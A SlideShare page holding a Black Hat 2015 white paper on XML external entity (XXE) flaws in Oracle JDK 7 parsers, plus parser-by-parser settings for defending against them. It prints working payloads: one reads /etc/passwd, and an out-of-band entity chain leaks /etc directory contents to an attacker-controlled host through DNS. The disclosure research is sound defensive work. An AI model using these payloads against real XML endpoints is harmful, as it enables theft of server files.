SlideShare une entreprise Scribd logo

[Blackhat2015] FileCry attack against Java

Moabi.com
Moabi.com

This document discusses vulnerabilities in XML parsers in Oracle JDK versions prior to 7u67. It demonstrates that the parsers are vulnerable to XML external entity (XXE) attacks despite existing defenses. It shows proof-of-concept payloads that can exfiltrate file contents like /etc/passwd from a remote server using untrusted XML files. While defenses exist, the document finds that they are insufficient and fail to mitigate XXE risks in many parsers. It evaluates the defenses in various XML parsers and recommends configurations to disable external entity resolution and prevent XXE attacks.

Internet
1  sur  7
Télécharger pour lire hors ligne
XXE defence(les)s in JDK XML parsers Sergey Gorbaty sergey.gorbaty@salesforce.com Xiaoran Wang xiaoran.wang@salesforce.com Hormazd Billimoria hbillimoria@salesforce.com Jonathan Brossard jbrossard@salesforce.com Product Security, Salesforce.com, San Francisco, CA, USA Abstract. This article will demonstrate that many Oracle JDK XML parsers are vulnerable to Xml eXternal Entity (XXE) attack. We shall also demonstrate that existing Java defenses against XXE attacks fall short and fail to protect against malicious malformed XML, which re- sults in a parsing error with external entities successfully expanded. Our exploit has the capability of exfiltrating files and launching directory traversals. We present a proof of concept dumping filenames under /tmp directory from a remote server running JDK 7 via untrusted XML files. It is our hope to raise awareness of the industry regarding the dangers of XXE-type of attacks. This should also result in upgrading the best practices for disabling external entity resolution for several XML parsers. Keywords: Java, XXE, XML, parser.
1 Introduction In the present article we will provide an overview of the standard attack using XML external entities. In the following subsection we will describe the effects of specific malformed XML attack scenario for JDK7-based XML parsers, which was first introduced in [1]. In the later subsection we will introduce defences that are recommended by authoritative sources and demonstrate where they fall short. 1.1 Background XML DTD can be constructed from internal, external and parameter entities. External entities are references to other entities that can be found outside of the current document. When XML parser encounters an external entity URI, it expands the reference to include the content from the external link in the current document. An external entity may reference a file or a URL. <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test>&xxe;</test> Fig. 1. Simple XXE payload 1.2 Introducing the Attack As it was alluded to in the previous section, the exception thrown by the XML parser may happen during various stages of parsing. JDK XML entity expander always assumes the external entity URL is well formed and will attempt to resolve it. Our first goal is to confirm that external entities are being resolved; therefore, we include an external URL in one entity. Our second goal is to create an entity pointing to an invalid URL, which is containing data resulted from expansion of another external en- tity. Such entity structure would force the XML parser to resolve some sensitive external entities first and then leak the resolved data using spe- cially crafted URL and finally throw an IOException. The IOException in this case is most often shadowed and thrown only after an attempt to resolve the entity URL at which point the attacker had already received the data via an attacker-controlled DNS resolver.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % payload SYSTEM "file:///etc"> <!ENTITY % dtd SYSTEM "http://externallyhostedentity.com/a.dtdâĂİ> %dtd; %release; ]><foo>business as usual</foo> Fig. 2. XXE with entity cross-references <!ENTITY % nested "<!ENTITY &#x25; release SYSTEM ’jar:%payload;.externallyhostedentity.com!/’>"> %nested; Fig. 3. Externally hosted a.dtd The main reason for having a separate a.dtd is that expanded references cannot be referenced in the same document. Figures 2 and 3 demonstrate how an attacker may learn if the parser is vulnerable to XXE by monitoring DNS resolver and/or http://externallyhostedentity. com HTTP logs. Furthermore, the XML parser may leak the directory content of /etc to the authoritative DNS resolver that holds A-type record for the attacker controlled http://externallyhostedentity.com. 2 Insufficient Recommendations Oracle JDK7 documentation contains plethora of information about XML parser configuration. One of the first options that come to developer’s mind is to enable FEATURE_SECURE_PROCESSING in order to pre- vent external connections. “When FEATURE_SECURE_PROCESSING is enabled it is recommended that implementations restrict external con- nections by default” [2], alas, despite Oracle’s recommendation XML parsers do not actually restrict external connections when FEATURE _SECURE_PROCESSING is enabled. When it comes to tackling XXE Oracle does not have explicit recommendations but for certain parsers it documents how to turn expansion of XML external entities off while other parses do not have a way to turn it off. OWASP recommendations [3] only cover major JDK parsers and respond to XXE threat by disabling of fetching external DTD altogether on most of them. Long et. all in [4] recommend creating a custom entity resolver for XMLReader but do not cover any others. [5] recommendations provide generic recommendations and only cover javax.xml.parsers.DocumentBuilderFactory specifics.
In the following sections we will examine each major JDK XML parser provider and see what capabilities it provides for mitigating XXE. 2.1 javax.xml.stream.XMLInputFactory Using setProperty method on this [6] Oracle XML factory, developer can set javax.xml.stream.isSupportingExternalEntities property to false. Un- fortunately, as we discovered [7] setting this property was not properly functioning and resulted in a 0-day vulnerability, which was addressed in JDK update 7u67. OWASP recommendation [3] for this parser ignores useful needs for XML DTD and recommends disabling external DTD altogether, which cer- tainly fixes the problem but may not be in line with the business needs. 2.2 javax.xml.parsers.DocumentBuilderFactory OWASP recommendations disabling the DTD but also mentions that if one cannot completely block DTD, she should simply disable the follow- ing propertes: http://xml.org/sax/features/external-general-entities, http://xml.org/sax/features/external-parameter-entities. Unfortunately, the documentation does not explicitly tell that disabling both of the above properties is required. Disabling http://xml.org/sax/ features/external-general-entities on its own would have no effect against the attack mentioned earler. Morgan et. all [5] and OWASP recommendations appear to be very sim- ilar. Oracle documents [8] that setAttribute method in this factory can be used to set XMLConstants.ACCESS_EXTERNAL_DTD and XMLConstants. ACCESS_EXTERNAL_SCHEMA properties, which would allow a de- veloper to restrict protocols that can be used to fetch DTD or schema. The developer should be aware that jar:// protocol is quite dangerous and should be excluded as it can resolve files and externally hosted web- sites. 2.3 javax.xml.parsers.SAXParserFactory Oracle documentation [9] for this factory does not include any features that would help us disable external entities processing. OWASP includes recommendations that range from disabling DTD to disabling external entities only. The defenses listed by OWASP are similar to the ones out- lined in 2.2.
2.4 javax.xml.transform.sax.SAXTransformerFactory and javax.xml.transform.TransformerFactory Oracle provides in [10] information on how to disable protocols that can be used to fetch external DTD and external entities. Unfortunately, it is not possible to turn off external entities without disabling DTD using XMLConstants.ACCESS_EXTERNAL_DTD attribute. 2.5 javax.xml.validation.SchemaFactory and javax.xml.validation.Validator These particular parsers allow a developer to provide a custom external resource resolver using setResourceResolver method [11][12]. Unfortu- nately, the default parameter value of null does not result in a safe be- havior and is, essentially, a no-op. The developer must supply a proper resolver else the attack will succeed. An alternative and safe way to mitigate the attack is to utilize setProp- erty method [13][14] with XMLConstants. ACCESS_EXTERNAL_DTD as the first parameter and whitelisted protocols as the second. 2.6 javax.xml.bind.Unmarshaller and javax.xml.xpath.XPathExpression As Oracle documentation suggests there isn’t a way to modify behavior of Unmarshaller in terms of resolving external entities: “There currently are not any properties required to be supported by all JAXB Providers on Unmarshaller” [15]. XPathExpression simply does not expose any public method to set properties. The only option to make these two parsers safe available is to parse the XML first, using a different safe parser, and then pass the result in. E.g. for Unmarshaller a developer would need to produce a safe java.xml.transform.Source and pass it to the unmarshal method. And for XPathExpression a safely parsed org.xml.sax.InputSource needs to be passed to the evaluate(...) method [16]. 3 Conclusion Each JDK parser has a specific configuration when it comes to prevent- ing XXE attacks. It is important to configure the parser for handling incorrect input as well as the one that is correct but knowingly produces errors.
References 1. Timur Yunusov, A.O.: Xml out-of-band data retrieval, BlackHat USA. https://media.blackhat.com/eu-13/briefings/Osipov/ bh-eu-13-XML-data-osipov-slides.pdf (2013) 2. Oracle: Property XMLConstants.ACCESS_EXTERNAL_DTD. (http://docs.oracle.com/javase/7/docs/api/javax/xml/ XMLConstants.html#ACCESS_EXTERNAL_DTD) 3. OWASP: Xml external entity (xxe) processing. (https: //www.owasp.org/index.php/XML_External_Entity_%28XXE% 29_Processing) 4. Fred Long, Dhruv Mohindra, R.C.D.F.D.S.: The CERT Oracle Se- cure Coding Standard for Java. Addison-Wesley (2012) 5. Timothy D. Morgan, O.A.I.: Xml schema, dtd, and entity attacks. http://vsecurity.com/download/papers/XMLDTDEntityAttacks. pdf (2014) 6. Oracle: Class xmlinputfactory. (http://docs.oracle.com/javase/ 7/docs/api/javax/xml/stream/XMLInputFactory.html) 7. Oracle: Oracle critical patch update advisory - october 2014. http://www.oracle.com/technetwork/topics/security/ cpuoct2014-1972960.html (2014) 8. Oracle: Function DocumentBuilderFactory.setAttribute(..). (http://docs.oracle.com/javase/7/docs/api/javax/xml/ parsers/DocumentBuilderFactory.html#setAttribute(java. lang.String,%20java.lang.Object)) 9. Oracle: Function SAXParserFactory.setFeature(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/parsers/ SAXParserFactory.html#setFeature(java.lang.String, %20boolean)) 10. Oracle: Function TransformerFactory.setAttribute(..). (http://docs.oracle.com/javase/7/docs/api/javax/xml/ transform/TransformerFactory.html#setAttribute(java.lang. String,%20java.lang.Object)) 11. Oracle: Function SchemaFactory.setResourceResolver(..). (http://docs.oracle.com/javase/7/docs/api/javax/xml/ validation/SchemaFactory.html#setResourceResolver(org. w3c.dom.ls.LSResourceResolver)) 12. Oracle: Function Validator.setResourceResolver(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/validation/ Validator.html#setResourceResolver(org.w3c.dom.ls. LSResourceResolver)) 13. Oracle: Function SchemaFactory.setProperty(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/validation/ SchemaFactory.html#setProperty(java.lang.String,%20java. lang.Object)) 14. Oracle: Function Validator.setProperty(..). (http://docs.oracle. com/javase/7/docs/api/javax/xml/validation/Validator. html#setProperty(java.lang.String,%20java.lang.Object)) 15. Oracle: Class Unmarshaller. (http://docs.oracle.com/javaee/7/ api/javax/xml/bind/Unmarshaller.html#supportedProps)
16. Oracle: Function XPathExpression.evaluate(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/xpath/ XPathExpression.html#evaluate(org.xml.sax.InputSource))

Recommandé

Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Yury Chemerkin
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Spring Certification Questions
Spring Certification QuestionsSpring Certification Questions
Spring Certification QuestionsSpringMockExams
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Context and Dependency Injection 2.0
Context and Dependency Injection 2.0Context and Dependency Injection 2.0
Context and Dependency Injection 2.0Brian S. Paskin
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Exceptional Handling in Java
Exceptional Handling in JavaExceptional Handling in Java
Exceptional Handling in JavaQaziUmarF786
 
Sql injection
Sql injectionSql injection
Sql injectionMehul Boghra
 

Recommandé

Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Yury Chemerkin
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Spring Certification Questions
Spring Certification QuestionsSpring Certification Questions
Spring Certification QuestionsSpringMockExams
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Context and Dependency Injection 2.0
Context and Dependency Injection 2.0Context and Dependency Injection 2.0
Context and Dependency Injection 2.0Brian S. Paskin
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Exceptional Handling in Java
Exceptional Handling in JavaExceptional Handling in Java
Exceptional Handling in JavaQaziUmarF786
 
Sql injection
Sql injectionSql injection
Sql injectionMehul Boghra
 
Java exception
Java exception Java exception
Java exception Arati Gadgil
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Exception Handling in Java
Exception Handling in JavaException Handling in Java
Exception Handling in JavaGanesh kumar reddy
 
Java - Exception Handling Concepts
Java - Exception Handling ConceptsJava - Exception Handling Concepts
Java - Exception Handling ConceptsVicter Paul
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
Spring 3 to 4
Spring 3 to 4Spring 3 to 4
Spring 3 to 4Sumit Gole
 
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriver
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriverjava.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriver
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriverTEJVEER SINGH
 
Java -Exception handlingunit-iv
Java -Exception handlingunit-ivJava -Exception handlingunit-iv
Java -Exception handlingunit-ivRubaNagarajan
 
Java and SPARQL
Java and SPARQLJava and SPARQL
Java and SPARQLRaji Ghawi
 
SQL2SPARQL
SQL2SPARQLSQL2SPARQL
SQL2SPARQLAlexandru Dron
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 
Java review: try catch
Java review: try catchJava review: try catch
Java review: try catchMuzahidul Islam
 
Exception handling and logging best practices
Exception handling and logging best practicesException handling and logging best practices
Exception handling and logging best practicesAngelin R
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)"Touching the UNTOUCHABLE" (YSTS Seventh Edition)
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)Nelson Brito
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Rootkit case
Rootkit caseRootkit case
Rootkit caseArtem I. Baranov
 
Java exception handling
Java exception handlingJava exception handling
Java exception handlingrithustutorials
 
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #WhitepaperMoabi.com
 
[Blackhat2015] FileCry attack against Internet Explorer
[Blackhat2015] FileCry attack against Internet Explorer[Blackhat2015] FileCry attack against Internet Explorer
[Blackhat2015] FileCry attack against Internet ExplorerMoabi.com
 

Contenu connexe

Tendances

Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Java - Exception Handling Concepts
Java - Exception Handling ConceptsJava - Exception Handling Concepts
Java - Exception Handling ConceptsVicter Paul
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriver
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriverjava.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriver
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriverTEJVEER SINGH
 
Java -Exception handlingunit-iv
Java -Exception handlingunit-ivJava -Exception handlingunit-iv
Java -Exception handlingunit-ivRubaNagarajan
 
Java and SPARQL
Java and SPARQLJava and SPARQL
Java and SPARQLRaji Ghawi
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 
Exception handling and logging best practices
Exception handling and logging best practicesException handling and logging best practices
Exception handling and logging best practicesAngelin R
 
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)"Touching the UNTOUCHABLE" (YSTS Seventh Edition)
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)Nelson Brito
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 

Tendances (20)

Java exception
Java exception Java exception
Java exception
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
Exception Handling in Java
Exception Handling in JavaException Handling in Java
Exception Handling in Java
 
Java - Exception Handling Concepts
Java - Exception Handling ConceptsJava - Exception Handling Concepts
Java - Exception Handling Concepts
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
 
Spring 3 to 4
Spring 3 to 4Spring 3 to 4
Spring 3 to 4
 
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriver
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriverjava.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriver
java.lang.ClassNotFoundException: oracle.jdbc.driver.OracaleDriver
 
Java -Exception handlingunit-iv
Java -Exception handlingunit-ivJava -Exception handlingunit-iv
Java -Exception handlingunit-iv
 
Java and SPARQL
Java and SPARQLJava and SPARQL
Java and SPARQL
 
SQL2SPARQL
SQL2SPARQLSQL2SPARQL
SQL2SPARQL
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internals
 
Java review: try catch
Java review: try catchJava review: try catch
Java review: try catch
 
Exception handling and logging best practices
Exception handling and logging best practicesException handling and logging best practices
Exception handling and logging best practices
 
Sql injection
Sql injectionSql injection
Sql injection
 
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)"Touching the UNTOUCHABLE" (YSTS Seventh Edition)
"Touching the UNTOUCHABLE" (YSTS Seventh Edition)
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Rootkit case
Rootkit caseRootkit case
Rootkit case
 
Java exception handling
Java exception handlingJava exception handling
Java exception handling
 

En vedette

[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #WhitepaperMoabi.com
 
[Blackhat2015] FileCry attack against Internet Explorer
[Blackhat2015] FileCry attack against Internet Explorer[Blackhat2015] FileCry attack against Internet Explorer
[Blackhat2015] FileCry attack against Internet ExplorerMoabi.com
 
Hardware backdooring is practical
Hardware backdooring is practicalHardware backdooring is practical
Hardware backdooring is practicalMoabi.com
 
[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit AutomationMoabi.com
 
Hardware backdooring is practical : slides
Hardware backdooring is practical : slidesHardware backdooring is practical : slides
Hardware backdooring is practical : slidesMoabi.com
 
[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...
[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...
[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...Moabi.com
 
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...Moabi.com
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionBart Leppens
 
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...Moabi.com
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)__x86
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012_mr_me
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practicalMoabi.com
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler CollectionMoabi.com
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 

En vedette (20)

[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... #Whitepaper
 
[Blackhat2015] FileCry attack against Internet Explorer
[Blackhat2015] FileCry attack against Internet Explorer[Blackhat2015] FileCry attack against Internet Explorer
[Blackhat2015] FileCry attack against Internet Explorer
 
Hardware backdooring is practical
Hardware backdooring is practicalHardware backdooring is practical
Hardware backdooring is practical
 
[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation
 
Hardware backdooring is practical : slides
Hardware backdooring is practical : slidesHardware backdooring is practical : slides
Hardware backdooring is practical : slides
 
[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...
[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...
[DEFCON] Bypassing preboot authentication passwords by instrumenting the BIOS...
 
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 

Similaire à [Blackhat2015] FileCry attack against Java

Perfomatix - Java Coding Standards
Perfomatix - Java Coding StandardsPerfomatix - Java Coding Standards
Perfomatix - Java Coding StandardsPerfomatix Solutions
 
Ch23 xml processing_with_java
Ch23 xml processing_with_javaCh23 xml processing_with_java
Ch23 xml processing_with_javaardnetij
 
Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...
Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...
Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...Marco Gralike
 
Cm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configurationCm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configurationdcervigni
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)Jay Thakker
 
Validating Xml
Validating XmlValidating Xml
Validating XmlLiquidHub
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworksphanleson
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthowaspindia
 
Drupal 8 meets to symphony
Drupal 8 meets to symphonyDrupal 8 meets to symphony
Drupal 8 meets to symphonyBrahampal Singh
 
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLEDATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLEijdms
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Positive Hack Days
 
XML notes.pptx
XML notes.pptxXML notes.pptx
XML notes.pptxAmarYa2
 
Breakfast cereal for advanced beginners
Breakfast cereal for advanced beginnersBreakfast cereal for advanced beginners
Breakfast cereal for advanced beginnersTruptiranjan Nayak
 

Similaire à [Blackhat2015] FileCry attack against Java (20)

Perfomatix - Java Coding Standards
Perfomatix - Java Coding StandardsPerfomatix - Java Coding Standards
Perfomatix - Java Coding Standards
 
Ch23
Ch23Ch23
Ch23
 
Ch23 xml processing_with_java
Ch23 xml processing_with_javaCh23 xml processing_with_java
Ch23 xml processing_with_java
 
Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...
Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...
Real World Experience With Oracle Xml Database 11g An Oracle Ace’s Perspectiv...
 
treeview
treeviewtreeview
treeview
 
treeview
treeviewtreeview
treeview
 
55j7
55j755j7
55j7
 
Java 9 Features
Java 9 FeaturesJava 9 Features
Java 9 Features
 
Cm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configurationCm5 secure code_training_1day_system configuration
Cm5 secure code_training_1day_system configuration
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)
 
Validating Xml
Validating XmlValidating Xml
Validating Xml
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
New and improved hacking oracle from web apps sumit sidharth
